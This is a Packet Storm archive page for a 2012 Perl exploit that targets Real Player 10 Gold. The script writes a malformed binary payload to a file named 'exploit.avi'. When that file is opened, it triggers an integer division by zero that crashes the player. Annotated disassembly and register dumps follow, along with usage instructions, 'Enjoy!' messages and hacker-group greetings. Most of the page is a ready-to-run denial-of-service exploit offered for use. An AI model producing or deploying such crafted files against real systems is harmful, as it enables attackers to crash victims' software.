exploit the possibilities

Real Player 10 Gold Exception Handling

Real Player 10 Gold Exception Handling
Posted Jun 28, 2012
Authored by Dark-Puzzle

This is a local exploit for Real Player 10 Gold that uses a division by zero to trigger an exception handler.

tags | exploit, denial of service, local
MD5 | 5aba1f29fe8514d97c360ffd073a44bd

Real Player 10 Gold Exception Handling

Change Mirror Download
#!/usr/bin/perl
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 _ __ __ __ 1
#1 /' \ __ /'__`\ /\ \__ /'__`\ 0
#0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
#1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
#0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
#1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
#0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
#1 \ \____/ >> Exploit database separated by exploit 0
#0 \/___/ type (local, remote, DoS, etc.) 1
#1 1
#0 [x] Official Website: http://www.1337day.com 0
#1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com #
#1 ========================================== 1
#0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
#0 1
#1 dark-puzzle[at]live[at]fr 0
#0 ========================================== 1
#1 Pentesting/exploit coding/bug research 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# [0day Exploits] Allah , Alwatan , Almalik .[0day Exploits]
# Exploit Title: Real Player 10 GOLD - Exception Handling Vulnerability .
# Author: Dark-Puzzle .
# Danger : Medium .
# Category :Local Exploit .
# Version: Latest : 10 GOLD (Other versions aren't tested yet )
# Vendor : http://www.real.com/
# Software Link : http://www.oldapps.com/real.php?old_real_player=12?download
# Date: 27 June 2012 .
#------------------------------------------------------------------------#
# #
# Usage : perl realplayer.pl #
# #
#------------------------------------------------------------------------#

my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00
\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50
\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e
\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2
\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2
\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29
\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53
\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad
\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff";


#[Disassembly]
#"\x0C\x20\x87\x74" PUSH EBX
#"\x0D\x20\x87\x74" MOV EAX,DWORD PTR SS:[EBP+8]
#"\x10\x20\x87\x74" MOV EBX,DWORD PTR SS:[EBP+C]
#"\x13\x20\x87\x74" MOV ECX,DWORD PTR SS:[EBP+10]
#"\x16\x20\x87\x74" MUL EBX
#"\x18\x20\x87\x74" MOV EBX,ECX
#"\x1A\x20\x87\x74" SHR EBX,1
#"\x1C\x20\x87\x74" ADD EAX,EBX
#"\x1E\x20\x87\x74" ADC EDX,0
#"\x21\x20\x87\x74" DIV ECX <<---- As we see we can't devise by Zero .So this occurs an error and the program crashes here .

#[Registers]
#EAX 00000000
#ECX 00000000
#EDX 00000000
#EBX 00000000

# error : Integer Division by Zero ---> Exception handling vulnerability .

# This Exception handling can lead to a DOS attack . However The Concept of using this vulnerability is the create an exception so the program crashes.And it's a local exploit .




my $file = "exploit.avi";

open ($File, ">$file");
print $File $h;
close ($File);
print "0/// Exploit By Dark-Puzzle ! \n";
print "1/// Follow me : http://fb.me/dark.puzzle \n";
print "0/// avi file Created Enjoy! \n";
print "N.B : If the program says to locate the file just browse into it's directory and select it , if not , Enjoy\n";

# End Of Exploit
#------------------------------------------------------------------------------------------------------------------------
#Dark-Puzzle (Souhail) .
#\x90
#Follow me : fb.me/dark.puzzle
#\x90
#Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army
#\x90
#Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers....
#\x90
#Pentesting is my LIFE .
#\x90
#GREY HAT Mercy From M0rocC0 .







Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    2 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    16 Files
  • 13
    Feb 13th
    19 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close